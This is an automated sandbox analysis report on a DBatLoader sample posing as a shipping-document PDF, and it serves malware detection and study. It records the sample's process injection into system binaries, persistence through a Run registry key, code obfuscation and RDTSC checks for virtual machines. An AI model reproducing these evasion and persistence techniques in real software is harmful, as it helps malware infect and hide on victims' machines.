Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA2D07	17_2_00AA2D07
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D0D20	17_2_009D0D20
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA1D55	17_2_00AA1D55
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA2EF7	17_2_00AA2EF7
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009F6E30	17_2_009F6E30
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA1FF1	17_2_00AA1FF1

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: String function: 00B8B150 appears 31 times
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: String function: 009DB150 appears 35 times

Contains functionality to call native functions

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_004185E0 NtCreateFile,	11_2_004185E0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00418690 NtReadFile,	11_2_00418690
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00418710 NtClose,	11_2_00418710
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_004187C0 NtAllocateVirtualMemory,	11_2_004187C0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_004185DA NtCreateFile,	11_2_004185DA
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041868A NtReadFile,	11_2_0041868A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041870C NtClose,	11_2_0041870C
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_004187BA NtAllocateVirtualMemory,	11_2_004187BA
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC98F0 NtReadVirtualMemory,LdrInitializeThunk,	11_2_00BC98F0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC9860 NtQuerySystemInformation,LdrInitializeThunk,	11_2_00BC9860
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC9840 NtDelayExecution,LdrInitializeThunk,	11_2_00BC9840
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC99A0 NtCreateSection,LdrInitializeThunk,	11_2_00BC99A0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	11_2_00BC9910
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC9A20 NtResumeThread,LdrInitializeThunk,	11_2_00BC9A20
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC9A00 NtProtectVirtualMemory,LdrInitializeThunk,	11_2_00BC9A00
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC9A50 NtCreateFile,LdrInitializeThunk,	11_2_00BC9A50
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC95D0 NtClose,LdrInitializeThunk,	11_2_00BC95D0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC9540 NtReadFile,LdrInitializeThunk,	11_2_00BC9540
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC96E0 NtFreeVirtualMemory,LdrInitializeThunk,	11_2_00BC96E0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC9660 NtAllocateVirtualMemory,LdrInitializeThunk,	11_2_00BC9660
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC97A0 NtUnmapViewOfSection,LdrInitializeThunk,	11_2_00BC97A0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC9780 NtMapViewOfSection,LdrInitializeThunk,	11_2_00BC9780
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC9FE0 NtCreateMutant,LdrInitializeThunk,	11_2_00BC9FE0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC9710 NtQueryInformationToken,LdrInitializeThunk,	11_2_00BC9710
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC98A0 NtWriteVirtualMemory,	11_2_00BC98A0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC9820 NtEnumerateKey,	11_2_00BC9820
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BCB040 NtSuspendThread,	11_2_00BCB040
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC99D0 NtCreateProcessEx,	11_2_00BC99D0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC9950 NtQueueApcThread,	11_2_00BC9950
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC9A80 NtOpenDirectoryObject,	11_2_00BC9A80
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC9A10 NtQuerySection,	11_2_00BC9A10
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BCA3B0 NtGetContextThread,	11_2_00BCA3B0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC9B00 NtSetValueKey,	11_2_00BC9B00
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_004185E0 NtCreateFile,	17_2_004185E0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00418690 NtReadFile,	17_2_00418690
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00418710 NtClose,	17_2_00418710
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_004187C0 NtAllocateVirtualMemory,	17_2_004187C0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_004185DA NtCreateFile,	17_2_004185DA
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_0041868A NtReadFile,	17_2_0041868A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_0041870C NtClose,	17_2_0041870C
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_004187BA NtAllocateVirtualMemory,	17_2_004187BA
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A198F0 NtReadVirtualMemory,LdrInitializeThunk,	17_2_00A198F0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19860 NtQuerySystemInformation,LdrInitializeThunk,	17_2_00A19860
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19840 NtDelayExecution,LdrInitializeThunk,	17_2_00A19840
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A199A0 NtCreateSection,LdrInitializeThunk,	17_2_00A199A0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19910 NtAdjustPrivilegesToken,LdrInitializeThunk,	17_2_00A19910
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19A20 NtResumeThread,LdrInitializeThunk,	17_2_00A19A20
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19A00 NtProtectVirtualMemory,LdrInitializeThunk,	17_2_00A19A00
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19A50 NtCreateFile,LdrInitializeThunk,	17_2_00A19A50
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A195D0 NtClose,LdrInitializeThunk,	17_2_00A195D0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19540 NtReadFile,LdrInitializeThunk,	17_2_00A19540
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A196E0 NtFreeVirtualMemory,LdrInitializeThunk,	17_2_00A196E0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19660 NtAllocateVirtualMemory,LdrInitializeThunk,	17_2_00A19660
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A197A0 NtUnmapViewOfSection,LdrInitializeThunk,	17_2_00A197A0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19780 NtMapViewOfSection,LdrInitializeThunk,	17_2_00A19780
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19FE0 NtCreateMutant,LdrInitializeThunk,	17_2_00A19FE0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19710 NtQueryInformationToken,LdrInitializeThunk,	17_2_00A19710
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A198A0 NtWriteVirtualMemory,	17_2_00A198A0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19820 NtEnumerateKey,	17_2_00A19820
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A1B040 NtSuspendThread,	17_2_00A1B040
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A199D0 NtCreateProcessEx,	17_2_00A199D0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19950 NtQueueApcThread,	17_2_00A19950
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19A80 NtOpenDirectoryObject,	17_2_00A19A80
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19A10 NtQuerySection,	17_2_00A19A10
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A1A3B0 NtGetContextThread,	17_2_00A1A3B0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19B00 NtSetValueKey,	17_2_00A19B00
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A195F0 NtQueryInformationFile,	17_2_00A195F0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19520 NtWaitForSingleObject,	17_2_00A19520
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A1AD30 NtSetContextThread,	17_2_00A1AD30
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19560 NtWriteFile,	17_2_00A19560
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A196D0 NtCreateKey,	17_2_00A196D0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19610 NtEnumerateValueKey,	17_2_00A19610
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19670 NtQueryInformationProcess,	17_2_00A19670
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19650 NtQueryValueKey,	17_2_00A19650
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19730 NtQueryVirtualMemory,	17_2_00A19730
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A1A710 NtOpenProcessToken,	17_2_00A1A710
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19760 NtOpenProcess,	17_2_00A19760
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19770 NtSetInformationFile,	17_2_00A19770
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A1A770 NtOpenThread,	17_2_00A1A770

Sample file is different than original file name gathered from version info

Source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 0000000B.00000002.372809046.0000000000752000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenamenetsh.exej% vs Original Shipment Doc Ref 2853801324189923,PDF.exe
Source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 0000000B.00000002.378783717.0000000000E0F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Original Shipment Doc Ref 2853801324189923,PDF.exe

PE file contains strange resources

Source: Nyedvqj.exe.1.dr

Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST

Tries to load missing DLLs

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Section loaded: msmpcom.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Section loaded: msmpcom.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Section loaded: msmpcom.dll	Jump to behavior

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe

File read: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe

Jump to behavior

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe 'C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe'
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Process created: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe
Source: unknown	Process created: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe 'C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe 'C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe'
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Process created: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Process created: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Process created: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Process created: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Process created: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Jump to behavior

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\Nyedvqjjpoxzcfrzmjpjbqexkpvtsgq[1]

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@12/5@14/9

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source:	Binary string: cmmon32.pdb source: Nyedvqj.exe, 00000012.00000002.403223771.00000000005DA000.00000004.00000020.sdmp
Source:	Binary string: netsh.pdb source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 0000000B.00000002.372809046.0000000000752000.00000004.00000020.sdmp
Source:	Binary string: cmmon32.pdbGCTL source: Nyedvqj.exe, 00000012.00000002.403223771.00000000005DA000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdbUGP source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 0000000B.00000002.376044686.0000000000B60000.00000040.00000001.sdmp, Nyedvqj.exe, 00000011.00000002.376043225.00000000009B0000.00000040.00000001.sdmp, Nyedvqj.exe, 00000012.00000002.403702389.0000000000A10000.00000040.00000001.sdmp, svchost.exe, 00000013.00000003.377211927.0000000003100000.00000004.00000001.sdmp, netsh.exe, 00000014.00000002.538070864.000000000395F000.00000040.00000001.sdmp, cmmon32.exe, 00000016.00000002.406881454.0000000004FDF000.00000040.00000001.sdmp
Source:	Binary string: netsh.pdbGCTL source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 0000000B.00000002.372809046.0000000000752000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdb source: Original Shipment Doc Ref 2853801324189923,PDF.exe, Nyedvqj.exe, Nyedvqj.exe, 00000012.00000002.403702389.0000000000A10000.00000040.00000001.sdmp, svchost.exe, 00000013.00000003.377211927.0000000003100000.00000004.00000001.sdmp, netsh.exe, 00000014.00000002.538070864.000000000395F000.00000040.00000001.sdmp, cmmon32.exe, 00000016.00000002.406881454.0000000004FDF000.00000040.00000001.sdmp
Source:	Binary string: svchost.pdb source: Nyedvqj.exe, 00000011.00000002.375953797.0000000000940000.00000040.00020000.sdmp
Source:	Binary string: svchost.pdbUGP source: Nyedvqj.exe, 00000011.00000002.375953797.0000000000940000.00000040.00020000.sdmp

Data Obfuscation:

Yara detected DBatLoader

Source: Yara match	File source: 0000000E.00000002.341748115.00000000023CA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.322398539.00000000009FA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.299172533.0000000000B1A000.00000004.00000001.sdmp, type: MEMORY

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Unpacked PE file: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack .text:ER;.itext:ER;.data:W;.bss:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Unpacked PE file: 17.2.Nyedvqj.exe.400000.0.unpack .text:ER;.itext:ER;.data:W;.bss:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Unpacked PE file: 18.2.Nyedvqj.exe.400000.0.unpack .text:ER;.itext:ER;.data:W;.bss:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03821BF0 push ebx; retf	1_3_03821BF1
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03826691 push 00000066h; retf	1_3_03826696
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_038266F9 push ebp; ret	1_3_038266FA
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03826629 push esi; iretd	1_3_0382662B
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03822655 push ebp; ret	1_3_03822656
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03822585 push esi; iretd	1_3_03822587
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_038225ED push 00000066h; retf	1_3_038225F2
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03823DFC pushfd ; ret	1_3_03823DFD
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03826528 push esi; ret	1_3_0382654C
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03822484 push esi; ret	1_3_038224A8
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03825C94 push ebx; retf	1_3_03825C95
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_038238C8 push edi; ret	1_3_038238C9
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03821BF0 push ebx; retf	1_3_03821BF1
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03826691 push 00000066h; retf	1_3_03826696
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_038266F9 push ebp; ret	1_3_038266FA
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03826629 push esi; iretd	1_3_0382662B
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03822655 push ebp; ret	1_3_03822656
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03822585 push esi; iretd	1_3_03822587
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_038225ED push 00000066h; retf	1_3_038225F2
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03823DFC pushfd ; ret	1_3_03823DFD
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03826528 push esi; ret	1_3_0382654C
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03822484 push esi; ret	1_3_038224A8
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03825C94 push ebx; retf	1_3_03825C95
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_038238C8 push edi; ret	1_3_038238C9
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041B832 push eax; ret	11_2_0041B838
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041B83B push eax; ret	11_2_0041B8A2
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041B89C push eax; ret	11_2_0041B8A2
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00415D38 push es; retf	11_2_00415D8B
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041CDC5 push es; ret	11_2_0041CDC6
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041A5BB pushfd ; ret	11_2_0041A5BC
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041B7E5 push eax; ret	11_2_0041B838

Persistence and Installation Behavior:

Creates processes with suspicious names

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	File created: \original shipment doc ref 2853801324189923,pdf.exe
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	File created: \original shipment doc ref 2853801324189923,pdf.exe			Jump to behavior

Drops PE files

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe

File created: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Nyedvqj			Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Nyedvqj			Jump to behavior

Source: C:\Windows\SysWOW64\netsh.exe

Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
